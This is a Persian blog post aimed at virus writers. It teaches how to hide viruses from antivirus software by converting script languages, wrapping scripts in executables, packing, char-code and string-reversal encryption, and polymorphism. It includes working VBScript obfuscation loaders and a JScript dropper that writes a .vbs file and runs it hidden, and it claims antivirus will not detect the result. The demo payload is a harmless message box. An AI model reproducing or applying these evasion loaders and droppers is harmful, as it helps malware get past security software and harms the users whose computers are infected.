ویروس ایرانی

در جای جای وبلاگ آموزش اینکریپت کردن فایل ها رو می تونید ببینید مثل پست قبل اما این پست رو به خاطر دوست هکر و ویروس نویس عزیزمون مدیر وبلاگ هکر های مهربان می نویسم که گفته بود مطلبی بنویسم که هر کسی با خلاقیت خودش بتونه ویروس ها رو اینکریپت کنه.به طور کلی دو روش برای این کار وجود داره که عبارتند از:

1.تغییر پسوند فایل

2.تغییر اطلاعات درون فایل به اطلاعات مبهم

آموزش هایی دورن وبلاگ در مورد اولی هست مثل آموزش تبدیل ویروس bat به vbs یا vbs به bat و بعضی از آموزش ها که دو گزینه داخلش به کار رفته مثل آموزش تبدیل ویروس vbs به js.

البته مورد یک خودش به سه قسمت تبدیل میشه که عبارتند از:

الف.تبدیل اسکریپت به اسکریپت

ب.تبدیل اسکریپت به اجرایی

ج.تبدیل اجرایی به اجرایی

مکانیزم کلی این سه روش را در ادامه نوشته ام.

الف.تبدیل اسکریپت به اسکریپت:

برای این کار باید به دو زبان اسکریپت آشنا باشید.برای مثال ابتدا ویروستون را به زبان A می نویسید.حالا به زبان B یک فایل می نویسید که کدهای ویروس به زبان A را در یک فایل دیگر به زبان A در مسیری دلخواه وارد کند و سپس آن فایل را اجرا کند.

ب.تبدیل اسکریپت به اجرایی

روش اول:از برنامه های از پیش تهیه شده استفاده کنید مانند فایل زیر که فایل vbs رو به فایل اجرایی com تبدیل می کند.

دانلود فایل با حجم 1.6 کیلو بایت

توجه:این فایل تحت DOC اجرا می شود.

روش دوم:ابتدا ویروستان را به زبان اسکریپت می نویسید.سپس یک فایل اجرایی می سازید که یک فایل به زبان اسکریپت در مسیری دلخواه بسازد و کدهای ویروس به زبان اسکریپت را در آن وارد کند و سپس فایل اسکریپت را اجرا کند.

ج.تبدیل اجرایی به اجرایی

روش اول:باز هم از برنامه های از پیش تهیه شده استفاده کنید مانند فایل زیر که حجم فایل هایی مانند EXE را کم می کند و سپس خودتان می توانید از طریق rename کردن پسوند فایل را به com تبدیل کنید یا بر عکس.

دانلود فایل با حجم 124 کیلو بایت

توجه:این فایل هم تحت DOC اجرا می شود.

روش دوم:ویروستان را به عنوان یک resource به فایل اجرایی با پسوند دیگر اضافه کنید.سپس فایل resource را استخراج کرده و اجرا کنید.

مورد دوم هم به چندین روش تقسیم می شود که عبارتند از:

الف.char encryption

ب.strreverse encryption

ج.polyencryption

د.hex encryption

ه.polymorphsm

این پنج روش بیشتر برای اسکریپت ها کاربرد دارد.در این پست به آموزش دو روش اکتفا می کنیم.

الف.char encryption

در پست قبل یاد گرفتیم که چه طور کدهای ویروس رو با تابع asc به عدد تبدیل کنیم.حالا ما همون عدد ها رو در دور از چشم آنتی ویروس ها به کد تبدیل می کنیم و در دور از چشم آنتی ویروس ها اجرا می کنیم.این کار رو برای هر خط انجام می دیم:

کدها قبل از اینکریپت:

Msgbox "reza"

Msgbox "reza"

کدها بعد از اینکریپت:

r = "execute(chr(109)&chr(115)&chr(103)&chr(98)&chr(111)&chr(120)&chr(32)&chr(34)&chr(114)&chr(101)&chr(1" r = r & "22)&chr(97)&chr(34)&chr(58)&chr(10))" execute r r = "execute(chr(109)&chr(115)&chr(103)&chr(98)&chr(111)&chr(120)&chr(32)&chr(34)&chr(114)&chr(101)&chr(1" r = r & "22)&chr(97)&chr(34)&chr(58)&chr(10))" execute r

توجه:برای هر خط عمل encryption را انجام دهید.

ب.strreverse encryption

ابتدا هر خط از ویروس بر عکس می شود.به عنوان مثال کلمه ی reza به azer تبدیل می شود.سپس در ابتدای هر خطی که بر عکس شده است علامت ' را قرار داده می شود تا یک توضیح محسوب شود.بعد از آن کدهایی نوشته می شوند که با توجه به تعداد خط هایی که برعکس شده اند ابتدا همه را می خواند و سپس دوباره برعکس می کند و علامت ' هم از آن ها بر می دارد و آن ها را اجرا می کند.

کدها قبل از اینکریپت:

Msgbox "reza"

Msgbox "reza"

کدها بعد از اینکریپت:

'"azer" xobgsm '"azer" xobgsm On error resume next Set fso = CreateObject("scripting.filesystemobject") Set c = fso.opentextfile(wscript.scriptfullname) n=2 Do buffer = c.readline buffer2 = strreverse(buffer) buffer3 = Mid(buffer2, 1, Len(buffer2) - 1) all=all &":"& buffer3 n = n - 1 Loop While n <> 0 r = Mid(All, 2, Len(All) - 1) execute(r)

توجه:بعد از n= تعداد خط هایی که برعکس کرده اید را بنویسید.

موفق باشید.

با روشی که گفته می شود می توانیید ویروس vbs ای که نوشته اید را به ویروس جاوا اسکریپت تبدیل کنید.یادگیری این کار دو فایده دارد.

1.آنتی ویروس ها به هیچ وجه ویروس شما را شناسایی نمی کنند.

2.مهارت تبدیل هر فایل vbs دیگر به js را خواهید داشت.

آنتی ویروس ها ویروس شما را نمی شناسند نیز خود دو علت دارد.

1.کدهای ویروس شما نه به زبان vbs است و نه js .

2.آنتی ویروس ها روی فایل های vbs حساسیت بیشتری دارند.

ابتدا با تابع asc ،شماره ی اسکی هر حرف ار سورس ویروس را به دست آورید و آن را یادداشت کنید.

R = asc("")

Msgbox(R)

بین دو علامت "" فقط یک حرف بنویسد اما اگر با error در مواجه شدید اول حرف مورد نظر را بنویسید و سپس یک حرف دلخواه اضافه کنید.

بعد از انجام این کار از کدهای js زیر به طوری که گفته می شود استفاده کنید.

var ntodqaik=String.fromCharCode(109,115,103,98,111,120,32,34,114,101,122,97,34,13,10,109,115,103,98,111,120,32,34,114,101,122,97,34) var fqsuitpt=WScript.CreatEoBJECT("Scripting.filesystemobject").CreateTextFile("fhkrqsmp.vbs") for(lolpknfd=0; lolpknfd<ntodqaik.length; lolpknfd++){ try{fqsuitpt.write(ntodqaik.charAt(lolpknfd))} catch(ddgvjjge){}} WScript.CreateObject("WScript.Shell").run("fhkrqsmp.vbs",0)

Msgbox "reza"

Msgbox "reza"

در خط اول این کدها از تابع chr استفاده شده است که درست برعکس asc کار می کند.یعنی حرف هایی که به عدد تبدیل کرده اید را به همان حرف ها تبدیل می کند.عبارت 13,10 در همین خط نیز به معنی نوشتن در خط بعد می باشد.در این کدها فقط یک بار از این عبارت استفاده شده است.

کدهایی که نوشته اید را در notepad کپی کرده و با پسوند js ذخیره کنید.جواب سوال هاتون هم در قسمت نظرات وبلاگ نوشتم.